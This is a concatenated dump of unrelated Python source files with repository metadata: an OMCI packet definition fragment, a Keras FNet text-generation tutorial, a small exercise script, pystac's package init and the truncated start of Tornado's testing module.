lambda pkt: pkt.message_type == OmciDelete.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciDeleteResponse), align=36),
lambda pkt: pkt.message_type == OmciDeleteResponse.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciSet), align=36),
lambda pkt: pkt.message_type == OmciSet.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciSetResponse), align=36),
lambda pkt: pkt.message_type == OmciSetResponse.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciGet), align=36),
lambda pkt: pkt.message_type == OmciGet.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciGetResponse), align=36),
lambda pkt: pkt.message_type == OmciGetResponse.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciGetAllAlarms), align=36),
lambda pkt: pkt.message_type == OmciGetAllAlarms.message_id),
ConditionalField(FixedLenField(
PacketField(
"omci_message", None, OmciGetAllAlarmsResponse), align=36),
lambda pkt:
pkt.message_type == OmciGetAllAlarmsResponse.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciGetAllAlarmsNext), align=36),
lambda pkt: pkt.message_type == OmciGetAllAlarmsNext.message_id),
ConditionalField(FixedLenField(
PacketField(
"omci_message", None, OmciGetAllAlarmsNextResponse), align=36),
lambda pkt:
pkt.message_type == OmciGetAllAlarmsNextResponse.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciMibUpload), align=36),
lambda pkt: pkt.message_type == OmciMibUpload.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciMibUploadResponse), align=36),
lambda pkt: pkt.message_type == OmciMibUploadResponse.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciMibUploadNext), align=36),
lambda pkt:
pkt.message_type == OmciMibUploadNext.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciMibUploadNextResponse), align=36),
lambda pkt: pkt.message_type == OmciMibUploadNextResponse.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciMibReset), align=36),
lambda pkt: pkt.message_type == OmciMibReset.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciMibResetResponse), align=36),
lambda pkt: pkt.message_type == OmciMibResetResponse.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciAlarmNotification), align=36),
lambda pkt: pkt.message_type == OmciAlarmNotification.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciAttributeValueChange), align=36),
lambda pkt: pkt.message_type == OmciAttributeValueChange.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciTestResult), align=36),
lambda pkt: pkt.message_type == OmciTestResult.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciReboot), align=36),
lambda pkt: pkt.message_type == OmciReboot.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciRebootResponse), align=36),
lambda pkt: pkt.message_type == OmciRebootResponse.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciGetNext), align=36),
lambda pkt: pkt.message_type == OmciGetNext.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciGetNextResponse), align=36),
lambda pkt: pkt.message_type == OmciGetNextResponse.message_id),
# TODO add entries for remaining OMCI message types
IntField("omci_trailer", 0x00000028)
]
# We needed to patch the do_dissect(...) method of Packet, because
# it wiped out already dissected conditional fields with None if they
# referred to the same field name. We marked the only new line of code
# with "Extra condition added".
def do_dissect(self, s):
raw = s
self.raw_packet_cache_fields = {}
for f in self.fields_desc:
if not s:
break
s, fval = f.getfield(self, s)
# We need to track fields with mutable values to discard
# .raw_packet_cache when needed.
if f.islist or f.holds_packets:
self.raw_packet_cache_fields[f.name] = f.do_copy(fval)
# Extra condition added
if fval is not None or f.name not in self.fields:
self.fields[f.name] = fval
assert(raw.endswith(s))
self.raw_packet_cache = raw[:-len(s)] if s else raw
self.explicit = 1
return s
| 49.960265 | 84 | 0.680806 |
737718b168477bc0ce2b08974cea753ecabf960c | 13,853 | py | Python | examples/nlp/text_generation_fnet.py | IMvision12/keras-io | 44997b0610db078e1109d0dbca58db8319dbc744 | [
"Apache-2.0"
] | null | null | null | examples/nlp/text_generation_fnet.py | IMvision12/keras-io | 44997b0610db078e1109d0dbca58db8319dbc744 | [
"Apache-2.0"
] | null | null | null | examples/nlp/text_generation_fnet.py | IMvision12/keras-io | 44997b0610db078e1109d0dbca58db8319dbc744 | [
"Apache-2.0"
] | 1 | 2022-01-21T11:34:34.000Z | 2022-01-21T11:34:34.000Z | """
Title: Text Generation using FNet
Author: [Darshan Deshpande](https://twitter.com/getdarshan)
Date created: 2021/10/05
Last modified: 2021/10/05
Description: FNet transformer for text generation in Keras.
"""
"""
## Introduction
The original transformer implementation (Vaswani et al., 2017) was one of the major
breakthroughs in Natural Language Processing, giving rise to important architectures such BERT and GPT.
However, the drawback of these architectures is
that the self-attention mechanism they use is computationally expensive. The FNet
architecture proposes to replace this self-attention attention with a leaner mechanism:
a Fourier transformation-based linear mixer for input tokens.
The FNet model was able to achieve 92-97% of BERT's accuracy while training 80% faster on
GPUs and almost 70% faster on TPUs. This type of design provides an efficient and small
model size, leading to faster inference times.
In this example, we will implement and train this architecture on the Cornell Movie
Dialog corpus to show the applicability of this model to text generation.
"""
"""
## Imports
"""
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
import os
import re
# Defining hyperparameters
VOCAB_SIZE = 8192
MAX_SAMPLES = 50000
BUFFER_SIZE = 20000
MAX_LENGTH = 40
EMBED_DIM = 256
LATENT_DIM = 512
NUM_HEADS = 8
BATCH_SIZE = 64
"""
## Loading data
We will be using the Cornell Dialog Corpus. We will parse the movie conversations into
questions and answers sets.
"""
path_to_zip = keras.utils.get_file(
"cornell_movie_dialogs.zip",
origin="http://www.cs.cornell.edu/~cristian/data/cornell_movie_dialogs_corpus.zip",
extract=True,
)
path_to_dataset = os.path.join(
os.path.dirname(path_to_zip), "cornell movie-dialogs corpus"
)
path_to_movie_lines = os.path.join(path_to_dataset, "movie_lines.txt")
path_to_movie_conversations = os.path.join(path_to_dataset, "movie_conversations.txt")
def load_conversations():
# Helper function for loading the conversation splits
id2line = {}
with open(path_to_movie_lines, errors="ignore") as file:
lines = file.readlines()
for line in lines:
parts = line.replace("\n", "").split(" +++$+++ ")
id2line[parts[0]] = parts[4]
inputs, outputs = [], []
with open(path_to_movie_conversations, "r") as file:
lines = file.readlines()
for line in lines:
parts = line.replace("\n", "").split(" +++$+++ ")
# get conversation in a list of line ID
conversation = [line[1:-1] for line in parts[3][1:-1].split(", ")]
for i in range(len(conversation) - 1):
inputs.append(id2line[conversation[i]])
outputs.append(id2line[conversation[i + 1]])
if len(inputs) >= MAX_SAMPLES:
return inputs, outputs
return inputs, outputs
questions, answers = load_conversations()
# Splitting training and validation sets
train_dataset = tf.data.Dataset.from_tensor_slices((questions[:40000], answers[:40000]))
val_dataset = tf.data.Dataset.from_tensor_slices((questions[40000:], answers[40000:]))
"""
### Preprocessing and Tokenization
"""
def preprocess_text(sentence):
sentence = tf.strings.lower(sentence)
# Adding a space between the punctuation and the last word to allow better tokenization
sentence = tf.strings.regex_replace(sentence, r"([?.!,])", r" \1 ")
# Replacing multiple continuous spaces with a single space
sentence = tf.strings.regex_replace(sentence, r"\s\s+", " ")
# Replacing non english words with spaces
sentence = tf.strings.regex_replace(sentence, r"[^a-z?.!,]+", " ")
sentence = tf.strings.strip(sentence)
sentence = tf.strings.join(["[start]", sentence, "[end]"], separator=" ")
return sentence
vectorizer = layers.TextVectorization(
VOCAB_SIZE,
standardize=preprocess_text,
output_mode="int",
output_sequence_length=MAX_LENGTH,
)
# We will adapt the vectorizer to both the questions and answers
# This dataset is batched to parallelize and speed up the process
vectorizer.adapt(tf.data.Dataset.from_tensor_slices((questions + answers)).batch(128))
"""
### Tokenizing and padding sentences using `TextVectorization`
"""
def vectorize_text(inputs, outputs):
inputs, outputs = vectorizer(inputs), vectorizer(outputs)
# One extra padding token to the right to match the output shape
outputs = tf.pad(outputs, [[0, 1]])
return (
{"encoder_inputs": inputs, "decoder_inputs": outputs[:-1]},
{"outputs": outputs[1:]},
)
train_dataset = train_dataset.map(vectorize_text, num_parallel_calls=tf.data.AUTOTUNE)
val_dataset = val_dataset.map(vectorize_text, num_parallel_calls=tf.data.AUTOTUNE)
train_dataset = (
train_dataset.cache()
.shuffle(BUFFER_SIZE)
.batch(BATCH_SIZE)
.prefetch(tf.data.AUTOTUNE)
)
val_dataset = val_dataset.cache().batch(BATCH_SIZE).prefetch(tf.data.AUTOTUNE)
"""
## Creating the FNet Encoder
The FNet paper proposes a replacement for the standard attention mechanism used by the
Transformer architecture (Vaswani et al., 2017).

The outputs of the FFT layer are complex numbers. To avoid dealing with complex layers,
only the real part (the magnitude) is extracted.
The dense layers that follow the Fourier transformation act as convolutions applied on
the frequency domain.
"""
class FNetEncoder(layers.Layer):
def __init__(self, embed_dim, dense_dim, **kwargs):
super(FNetEncoder, self).__init__(**kwargs)
self.embed_dim = embed_dim
self.dense_dim = dense_dim
self.dense_proj = keras.Sequential(
[
layers.Dense(dense_dim, activation="relu"),
layers.Dense(embed_dim),
]
)
self.layernorm_1 = layers.LayerNormalization()
self.layernorm_2 = layers.LayerNormalization()
def call(self, inputs):
# Casting the inputs to complex64
inp_complex = tf.cast(inputs, tf.complex64)
# Projecting the inputs to the frequency domain using FFT2D and
# extracting the real part of the output
fft = tf.math.real(tf.signal.fft2d(inp_complex))
proj_input = self.layernorm_1(inputs + fft)
proj_output = self.dense_proj(proj_input)
return self.layernorm_2(proj_input + proj_output)
"""
## Creating the Decoder
The decoder architecture remains the same as the one proposed by (Vaswani et al., 2017)
in the original transformer architecture, consisting of an embedding, positional
encoding, two masked multihead attention layers and finally the dense output layers.
The architecture that follows is taken from
[Deep Learning with Python, second edition, chapter 11](https://www.manning.com/books/deep-learning-with-python-second-edition).
"""
class PositionalEmbedding(layers.Layer):
def __init__(self, sequence_length, vocab_size, embed_dim, **kwargs):
super(PositionalEmbedding, self).__init__(**kwargs)
self.token_embeddings = layers.Embedding(
input_dim=vocab_size, output_dim=embed_dim
)
self.position_embeddings = layers.Embedding(
input_dim=sequence_length, output_dim=embed_dim
)
self.sequence_length = sequence_length
self.vocab_size = vocab_size
self.embed_dim = embed_dim
def call(self, inputs):
length = tf.shape(inputs)[-1]
positions = tf.range(start=0, limit=length, delta=1)
embedded_tokens = self.token_embeddings(inputs)
embedded_positions = self.position_embeddings(positions)
return embedded_tokens + embedded_positions
def compute_mask(self, inputs, mask=None):
return tf.math.not_equal(inputs, 0)
class FNetDecoder(layers.Layer):
def __init__(self, embed_dim, latent_dim, num_heads, **kwargs):
super(FNetDecoder, self).__init__(**kwargs)
self.embed_dim = embed_dim
self.latent_dim = latent_dim
self.num_heads = num_heads
self.attention_1 = layers.MultiHeadAttention(
num_heads=num_heads, key_dim=embed_dim
)
self.attention_2 = layers.MultiHeadAttention(
num_heads=num_heads, key_dim=embed_dim
)
self.dense_proj = keras.Sequential(
[
layers.Dense(latent_dim, activation="relu"),
layers.Dense(embed_dim),
]
)
self.layernorm_1 = layers.LayerNormalization()
self.layernorm_2 = layers.LayerNormalization()
self.layernorm_3 = layers.LayerNormalization()
self.supports_masking = True
def call(self, inputs, encoder_outputs, mask=None):
causal_mask = self.get_causal_attention_mask(inputs)
if mask is not None:
padding_mask = tf.cast(mask[:, tf.newaxis, :], dtype="int32")
padding_mask = tf.minimum(padding_mask, causal_mask)
attention_output_1 = self.attention_1(
query=inputs, value=inputs, key=inputs, attention_mask=causal_mask
)
out_1 = self.layernorm_1(inputs + attention_output_1)
attention_output_2 = self.attention_2(
query=out_1,
value=encoder_outputs,
key=encoder_outputs,
attention_mask=padding_mask,
)
out_2 = self.layernorm_2(out_1 + attention_output_2)
proj_output = self.dense_proj(out_2)
return self.layernorm_3(out_2 + proj_output)
def get_causal_attention_mask(self, inputs):
input_shape = tf.shape(inputs)
batch_size, sequence_length = input_shape[0], input_shape[1]
i = tf.range(sequence_length)[:, tf.newaxis]
j = tf.range(sequence_length)
mask = tf.cast(i >= j, dtype="int32")
mask = tf.reshape(mask, (1, input_shape[1], input_shape[1]))
mult = tf.concat(
[tf.expand_dims(batch_size, -1), tf.constant([1, 1], dtype=tf.int32)],
axis=0,
)
return tf.tile(mask, mult)
def create_model():
encoder_inputs = keras.Input(shape=(None,), dtype="int32", name="encoder_inputs")
x = PositionalEmbedding(MAX_LENGTH, VOCAB_SIZE, EMBED_DIM)(encoder_inputs)
encoder_outputs = FNetEncoder(EMBED_DIM, LATENT_DIM)(x)
encoder = keras.Model(encoder_inputs, encoder_outputs)
decoder_inputs = keras.Input(shape=(None,), dtype="int32", name="decoder_inputs")
encoded_seq_inputs = keras.Input(
shape=(None, EMBED_DIM), name="decoder_state_inputs"
)
x = PositionalEmbedding(MAX_LENGTH, VOCAB_SIZE, EMBED_DIM)(decoder_inputs)
x = FNetDecoder(EMBED_DIM, LATENT_DIM, NUM_HEADS)(x, encoded_seq_inputs)
x = layers.Dropout(0.5)(x)
decoder_outputs = layers.Dense(VOCAB_SIZE, activation="softmax")(x)
decoder = keras.Model(
[decoder_inputs, encoded_seq_inputs], decoder_outputs, name="outputs"
)
decoder_outputs = decoder([decoder_inputs, encoder_outputs])
fnet = keras.Model([encoder_inputs, decoder_inputs], decoder_outputs, name="fnet")
return fnet
"""
## Creating and Training the model
"""
fnet = create_model()
fnet.compile("adam", loss="sparse_categorical_crossentropy", metrics=["accuracy"])
"""
Here, the `epochs` parameter is set to a single epoch, but in practice the model will take around
**20-30 epochs** of training to start outputting comprehensible sentences. Although accuracy
is not a good measure for this task, we will use it just to get a hint of the improvement
of the network.
"""
fnet.fit(train_dataset, epochs=1, validation_data=val_dataset)
"""
## Performing inference
"""
VOCAB = vectorizer.get_vocabulary()
def decode_sentence(input_sentence):
# Mapping the input sentence to tokens and adding start and end tokens
tokenized_input_sentence = vectorizer(
tf.constant("[start] " + preprocess_text(input_sentence) + " [end]")
)
# Initializing the initial sentence consisting of only the start token.
tokenized_target_sentence = tf.expand_dims(VOCAB.index("[start]"), 0)
decoded_sentence = ""
for i in range(MAX_LENGTH):
# Get the predictions
predictions = fnet.predict(
{
"encoder_inputs": tf.expand_dims(tokenized_input_sentence, 0),
"decoder_inputs": tf.expand_dims(
tf.pad(
tokenized_target_sentence,
[[0, MAX_LENGTH - tf.shape(tokenized_target_sentence)[0]]],
),
0,
),
}
)
# Calculating the token with maximum probability and getting the corresponding word
sampled_token_index = tf.argmax(predictions[0, i, :])
sampled_token = VOCAB[sampled_token_index.numpy()]
# If sampled token is the end token then stop generating and return the sentence
if tf.equal(sampled_token_index, VOCAB.index("[end]")):
break
decoded_sentence += sampled_token + " "
tokenized_target_sentence = tf.concat(
[tokenized_target_sentence, [sampled_token_index]], 0
)
return decoded_sentence
decode_sentence("Where have you been all this time?")
"""
## Conclusion
This example shows how to train and perform inference using the FNet model.
For getting insight into the architecture or for further reading, you can refer to:
1. [FNet: Mixing Tokens with Fourier Transforms](https://arxiv.org/abs/2105.03824v3)
(Lee-Thorp et al., 2021)
2. [Attention Is All You Need](https://arxiv.org/abs/1706.03762v5) (Vaswani et al.,
2017)
Thanks to François Chollet for his Keras example on
[English-to-Spanish translation with a sequence-to-sequence Transformer](https://keras.io/examples/nlp/neural_machine_translation_with_transformer/)
from which the decoder implementation was extracted.
"""
| 35.795866 | 148 | 0.693279 |
66ae82dab4a607843bf070f7636cdf9c15b1603f | 173 | py | Python | summer-of-code/week-02/Nessa/moo.py | supersciencegrl/toolkitten | 59c661e58d23a55ff2651fee8ab7d9b2fe9aded6 | [
"MIT"
] | null | null | null | summer-of-code/week-02/Nessa/moo.py | supersciencegrl/toolkitten | 59c661e58d23a55ff2651fee8ab7d9b2fe9aded6 | [
"MIT"
] | null | null | null | summer-of-code/week-02/Nessa/moo.py | supersciencegrl/toolkitten | 59c661e58d23a55ff2651fee8ab7d9b2fe9aded6 | [
"MIT"
] | null | null | null | # ### MOO ###
# print("")
# print("### MOO ###")
# print("")
# n = int(input("How many cows do you have? "))
def moo(n):
print("moo " * n)
return("moo " * n)
# moo(n) | 13.307692 | 47 | 0.462428 |
533fb429fac086b7499c7b14eed67adf5b19db24 | 7,452 | py | Python | pystac/__init__.py | itcarroll/pystac | 6c00d2efbf2fece6ac10d9e5d6a712aee75057a2 | [
"Apache-2.0"
] | 60 | 2019-09-09T20:14:08.000Z | 2020-08-19T06:59:33.000Z | pystac/__init__.py | itcarroll/pystac | 6c00d2efbf2fece6ac10d9e5d6a712aee75057a2 | [
"Apache-2.0"
] | 87 | 2019-09-14T15:47:23.000Z | 2020-08-19T16:23:32.000Z | pystac/__init__.py | itcarroll/pystac | 6c00d2efbf2fece6ac10d9e5d6a712aee75057a2 | [
"Apache-2.0"
] | 24 | 2019-10-16T17:13:46.000Z | 2020-08-19T04:36:58.000Z | """
PySTAC is a library for working with SpatioTemporal Asset Catalogs (STACs)
"""
__all__ = [
"__version__",
"STACError",
"STACTypeError",
"DuplicateObjectKeyError",
"ExtensionAlreadyExistsError",
"ExtensionNotImplemented",
"ExtensionTypeError",
"RequiredPropertyMissing",
"STACValidationError",
"MediaType",
"RelType",
"StacIO",
"STACObject",
"STACObjectType",
"Link",
"HIERARCHICAL_LINKS",
"Catalog",
"CatalogType",
"Collection",
"Extent",
"SpatialExtent",
"TemporalExtent",
"Summaries",
"CommonMetadata",
"RangeSummary",
"Item",
"Asset",
"ItemCollection",
"Provider",
"ProviderRole",
"read_file",
"read_dict",
"write_file",
"get_stac_version",
"set_stac_version",
]
import os
from typing import Any, AnyStr, Dict, Optional, Union
from pystac.errors import (
STACError,
STACTypeError,
DuplicateObjectKeyError,
ExtensionAlreadyExistsError,
ExtensionNotImplemented,
ExtensionTypeError,
RequiredPropertyMissing,
STACValidationError,
)
from pystac.version import (
__version__,
get_stac_version,
set_stac_version,
)
from pystac.media_type import MediaType
from pystac.rel_type import RelType
from pystac.stac_io import StacIO
from pystac.stac_object import STACObject, STACObjectType
from pystac.link import Link, HIERARCHICAL_LINKS, HREF
from pystac.catalog import Catalog, CatalogType
from pystac.collection import (
Collection,
Extent,
SpatialExtent,
TemporalExtent,
)
from pystac.common_metadata import CommonMetadata
from pystac.summaries import RangeSummary, Summaries
from pystac.asset import Asset
from pystac.item import Item
from pystac.item_collection import ItemCollection
from pystac.provider import ProviderRole, Provider
import pystac.validation
import pystac.extensions.hooks
import pystac.extensions.datacube
import pystac.extensions.eo
import pystac.extensions.file
import pystac.extensions.item_assets
import pystac.extensions.label
import pystac.extensions.pointcloud
import pystac.extensions.projection
import pystac.extensions.sar
import pystac.extensions.sat
import pystac.extensions.scientific
import pystac.extensions.storage
import pystac.extensions.table
import pystac.extensions.timestamps
import pystac.extensions.version
import pystac.extensions.view
EXTENSION_HOOKS = pystac.extensions.hooks.RegisteredExtensionHooks(
[
pystac.extensions.datacube.DATACUBE_EXTENSION_HOOKS,
pystac.extensions.eo.EO_EXTENSION_HOOKS,
pystac.extensions.file.FILE_EXTENSION_HOOKS,
pystac.extensions.item_assets.ITEM_ASSETS_EXTENSION_HOOKS,
pystac.extensions.label.LABEL_EXTENSION_HOOKS,
pystac.extensions.pointcloud.POINTCLOUD_EXTENSION_HOOKS,
pystac.extensions.projection.PROJECTION_EXTENSION_HOOKS,
pystac.extensions.sar.SAR_EXTENSION_HOOKS,
pystac.extensions.sat.SAT_EXTENSION_HOOKS,
pystac.extensions.scientific.SCIENTIFIC_EXTENSION_HOOKS,
pystac.extensions.storage.STORAGE_EXTENSION_HOOKS,
pystac.extensions.table.TABLE_EXTENSION_HOOKS,
pystac.extensions.timestamps.TIMESTAMPS_EXTENSION_HOOKS,
pystac.extensions.version.VERSION_EXTENSION_HOOKS,
pystac.extensions.view.VIEW_EXTENSION_HOOKS,
]
)
def read_file(href: HREF, stac_io: Optional[StacIO] = None) -> STACObject:
"""Reads a STAC object from a file.
This method will return either a Catalog, a Collection, or an Item based on what
the file contains.
This is a convenience method for :meth:`StacIO.read_stac_object
<pystac.StacIO.read_stac_object>`
Args:
href : The HREF to read the object from.
stac_io: Optional :class:`~StacIO` instance to use for I/O operations. If not
provided, will use :meth:`StacIO.default` to create an instance.
Returns:
The specific STACObject implementation class that is represented
by the JSON read from the file located at HREF.
Raises:
STACTypeError : If the file at ``href`` does not represent a valid
:class:`~pystac.STACObject`. Note that an :class:`~pystac.ItemCollection`
is not a :class:`~pystac.STACObject` and must be read using
:meth:`ItemCollection.from_file <pystac.ItemCollection.from_file>`
"""
if stac_io is None:
stac_io = StacIO.default()
return stac_io.read_stac_object(href)
def write_file(
obj: STACObject,
include_self_link: bool = True,
dest_href: Optional[HREF] = None,
stac_io: Optional[StacIO] = None,
) -> None:
"""Writes a STACObject to a file.
This will write only the Catalog, Collection or Item ``obj``. It will not attempt
to write any other objects that are linked to ``obj``; if you'd like functionality
to save off catalogs recursively see :meth:`Catalog.save <pystac.Catalog.save>`.
This method will write the JSON of the object to the object's assigned "self" link
or to the dest_href if provided. To set the self link, see
:meth:`STACObject.set_self_href <pystac.STACObject.set_self_href>`.
Convenience method for :meth:`STACObject.from_file <pystac.STACObject.from_file>`
Args:
obj : The STACObject to save.
include_self_link : If ``True``, include the ``"self"`` link with this object.
Otherwise, leave out the self link.
dest_href : Optional HREF to save the file to. If ``None``, the object will be
saved to the object's ``"self"`` href.
stac_io: Optional :class:`~StacIO` instance to use for I/O operations. If not
provided, will use :meth:`StacIO.default` to create an instance.
"""
if stac_io is None:
stac_io = StacIO.default()
dest_href = None if dest_href is None else str(os.fspath(dest_href))
obj.save_object(
include_self_link=include_self_link, dest_href=dest_href, stac_io=stac_io
)
def read_dict(
d: Dict[str, Any],
href: Optional[str] = None,
root: Optional[Catalog] = None,
stac_io: Optional[StacIO] = None,
) -> STACObject:
"""Reads a :class:`~STACObject` or :class:`~ItemCollection` from a JSON-like dict
representing a serialized STAC object.
This method will return either a :class:`~Catalog`, :class:`~Collection`,
or :class`~Item` based on the contents of the dict.
This is a convenience method for either
:meth:`StacIO.stac_object_from_dict <pystac.StacIO.stac_object_from_dict>`.
Args:
d : The dict to parse.
href : Optional href that is the file location of the object being
parsed.
root : Optional root of the catalog for this object.
If provided, the root's resolved object cache can be used to search for
previously resolved instances of the STAC object.
stac_io: Optional :class:`~StacIO` instance to use for reading. If ``None``,
the default instance will be used.
Raises:
STACTypeError : If the ``d`` dictionary does not represent a valid
:class:`~pystac.STACObject`. Note that an :class:`~pystac.ItemCollection`
is not a :class:`~pystac.STACObject` and must be read using
:meth:`ItemCollection.from_dict <pystac.ItemCollection.from_dict>`
"""
if stac_io is None:
stac_io = StacIO.default()
return stac_io.stac_object_from_dict(d, href, root)
| 34.341014 | 86 | 0.711487 |
f3cfb77355d64f00cedd3455afd701bee6c43291 | 27,220 | py | Python | tornado/testing.py | codeb2cc/tornado | 1b6157dd03dbb393de5d1066a31f4810bf609686 | [
"Apache-2.0"
] | 2 | 2015-08-14T18:53:45.000Z | 2015-11-03T14:28:57.000Z | tornado/testing.py | yjkyz/tornado | d53f72fe6716e2c6956695ec1001930578e67407 | [
"Apache-2.0"
] | 1 | 2022-02-11T03:48:33.000Z | 2022-02-11T03:48:33.000Z | tornado/testing.py | yjkyz/tornado | d53f72fe6716e2c6956695ec1001930578e67407 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""Support classes for automated testing.
* `AsyncTestCase` and `AsyncHTTPTestCase`: Subclasses of unittest.TestCase
with additional support for testing asynchronous (`.IOLoop` based) code.
* `ExpectLog` and `LogTrapTestCase`: Make test logs less spammy.
* `main()`: A simple test runner (wrapper around unittest.main()) with support
for the tornado.autoreload module to rerun the tests when code changes.
"""
from __future__ import absolute_import, division, print_function, with_statement
try:
from tornado import gen
from tornado.httpclient import AsyncHTTPClient
from tornado.httpserver import HTTPServer
from tornado.simple_httpclient import SimpleAsyncHTTPClient
from tornado.ioloop import IOLoop, TimeoutError
from tornado import netutil
from tornado.process import Subprocess
except ImportError:
# These modules are not importable on app engine. Parts of this module
# won't work, but e.g. LogTrapTestCase and main() will.
AsyncHTTPClient = None
gen = None
HTTPServer = None
IOLoop = None
netutil = None
SimpleAsyncHTTPClient = None
Subprocess = None
from tornado.log import gen_log, app_log
from tornado.stack_context import ExceptionStackContext
from tornado.util import raise_exc_info, basestring_type
import functools
import logging
import os
import re
import signal
import socket
import sys
import types
try:
from cStringIO import StringIO # py2
except ImportError:
from io import StringIO # py3
try:
from collections.abc import Generator as GeneratorType # py35+
except ImportError:
from types import GeneratorType
# Tornado's own test suite requires the updated unittest module
# (either py27+ or unittest2) so tornado.test.util enforces
# this requirement, but for other users of tornado.testing we want
# to allow the older version if unitest2 is not available.
if sys.version_info >= (3,):
# On python 3, mixing unittest2 and unittest (including doctest)
# doesn't seem to work, so always use unittest.
import unittest
else:
# On python 2, prefer unittest2 when available.
try:
import unittest2 as unittest
except ImportError:
import unittest
_next_port = 10000
def get_unused_port():
"""Returns a (hopefully) unused port number.
This function does not guarantee that the port it returns is available,
only that a series of get_unused_port calls in a single process return
distinct ports.
.. deprecated::
Use bind_unused_port instead, which is guaranteed to find an unused port.
"""
global _next_port
port = _next_port
_next_port = _next_port + 1
return port
def bind_unused_port():
"""Binds a server socket to an available port on localhost.
Returns a tuple (socket, port).
"""
[sock] = netutil.bind_sockets(None, 'localhost', family=socket.AF_INET)
port = sock.getsockname()[1]
return sock, port
def get_async_test_timeout():
"""Get the global timeout setting for async tests.
Returns a float, the timeout in seconds.
.. versionadded:: 3.1
"""
try:
return float(os.environ.get('ASYNC_TEST_TIMEOUT'))
except (ValueError, TypeError):
return 5
class _TestMethodWrapper(object):
"""Wraps a test method to raise an error if it returns a value.
This is mainly used to detect undecorated generators (if a test
method yields it must use a decorator to consume the generator),
but will also detect other kinds of return values (these are not
necessarily errors, but we alert anyway since there is no good
reason to return a value from a test.
"""
def __init__(self, orig_method):
self.orig_method = orig_method
def __call__(self, *args, **kwargs):
result = self.orig_method(*args, **kwargs)
if isinstance(result, GeneratorType):
raise TypeError("Generator test methods should be decorated with "
"tornado.testing.gen_test")
elif result is not None:
raise ValueError("Return value from test method ignored: %r" %
result)
def __getattr__(self, name):
"""Proxy all unknown attributes to the original method.
This is important for some of the decorators in the `unittest`
module, such as `unittest.skipIf`.
"""
return getattr(self.orig_method, name)
class AsyncTestCase(unittest.TestCase):
"""`~unittest.TestCase` subclass for testing `.IOLoop`-based
asynchronous code.
The unittest framework is synchronous, so the test must be
complete by the time the test method returns. This means that
asynchronous code cannot be used in quite the same way as usual.
To write test functions that use the same ``yield``-based patterns
used with the `tornado.gen` module, decorate your test methods
with `tornado.testing.gen_test` instead of
`tornado.gen.coroutine`. This class also provides the `stop()`
and `wait()` methods for a more manual style of testing. The test
method itself must call ``self.wait()``, and asynchronous
callbacks should call ``self.stop()`` to signal completion.
By default, a new `.IOLoop` is constructed for each test and is available
as ``self.io_loop``. This `.IOLoop` should be used in the construction of
HTTP clients/servers, etc. If the code being tested requires a
global `.IOLoop`, subclasses should override `get_new_ioloop` to return it.
The `.IOLoop`'s ``start`` and ``stop`` methods should not be
called directly. Instead, use `self.stop <stop>` and `self.wait
<wait>`. Arguments passed to ``self.stop`` are returned from
``self.wait``. It is possible to have multiple ``wait``/``stop``
cycles in the same test.
Example::
# This test uses coroutine style.
class MyTestCase(AsyncTestCase):
@tornado.testing.gen_test
def test_http_fetch(self):
client = AsyncHTTPClient(self.io_loop)
response = yield client.fetch("http://www.tornadoweb.org")
# Test contents of response
self.assertIn("FriendFeed", response.body)
# This test uses argument passing between self.stop and self.wait.
class MyTestCase2(AsyncTestCase):
def test_http_fetch(self):
client = AsyncHTTPClient(self.io_loop)
client.fetch("http://www.tornadoweb.org/", self.stop)
response = self.wait()
# Test contents of response
self.assertIn("FriendFeed", response.body)
# This test uses an explicit callback-based style.
class MyTestCase3(AsyncTestCase):
def test_http_fetch(self):
client = AsyncHTTPClient(self.io_loop)
client.fetch("http://www.tornadoweb.org/", self.handle_fetch)
self.wait()
def handle_fetch(self, response):
# Test contents of response (failures and exceptions here
# will cause self.wait() to throw an exception and end the
# test).
# Exceptions thrown here are magically propagated to
# self.wait() in test_http_fetch() via stack_context.
self.assertIn("FriendFeed", response.body)
self.stop()
"""
def __init__(self, methodName='runTest', **kwargs):
super(AsyncTestCase, self).__init__(methodName, **kwargs)
self.__stopped = False
self.__running = False
self.__failure = None
self.__stop_args = None
self.__timeout = None
# It's easy to forget the @gen_test decorator, but if you do
# the test will silently be ignored because nothing will consume
# the generator. Replace the test method with a wrapper that will
# make sure it's not an undecorated generator.
setattr(self, methodName, _TestMethodWrapper(getattr(self, methodName)))
def setUp(self):
super(AsyncTestCase, self).setUp()
self.io_loop = self.get_new_ioloop()
self.io_loop.make_current()
def tearDown(self):
# Clean up Subprocess, so it can be used again with a new ioloop.
Subprocess.uninitialize()
self.io_loop.clear_current()
if (not IOLoop.initialized() or
self.io_loop is not IOLoop.instance()):
# Try to clean up any file descriptors left open in the ioloop.
# This avoids leaks, especially when tests are run repeatedly
# in the same process with autoreload (because curl does not
# set FD_CLOEXEC on its file descriptors)
self.io_loop.close(all_fds=True)
super(AsyncTestCase, self).tearDown()
# In case an exception escaped or the StackContext caught an exception
# when there wasn't a wait() to re-raise it, do so here.
# This is our last chance to raise an exception in a way that the
# unittest machinery understands.
self.__rethrow()
def get_new_ioloop(self):
"""Creates a new `.IOLoop` for this test. May be overridden in
subclasses for tests that require a specific `.IOLoop` (usually
the singleton `.IOLoop.instance()`).
"""
return IOLoop()
def _handle_exception(self, typ, value, tb):
if self.__failure is None:
